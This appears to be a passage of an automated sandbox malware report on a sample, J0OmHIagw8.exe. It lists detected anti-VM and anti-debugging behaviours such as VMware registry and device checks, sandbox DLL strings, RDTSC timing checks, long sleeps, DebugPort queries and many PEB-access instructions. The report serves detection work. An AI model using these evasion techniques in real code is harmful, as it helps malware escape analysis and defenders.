          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: J0OmHIagw8.exe PID: 5816, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030F85E4 second address: 00000000030F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030F897E second address: 00000000030F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 5328Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 4112Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6624Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6404Thread sleep count: 33 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 6404Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.258703934.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: control.exe, 00000008.00000002.570842629.0000000000D14000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.251327827.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.259244656.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.251346760.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05403D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05443540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05473D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0544A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05478DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05408EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0545FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F36CC mov eax, dword ptr fs:[00000030h]
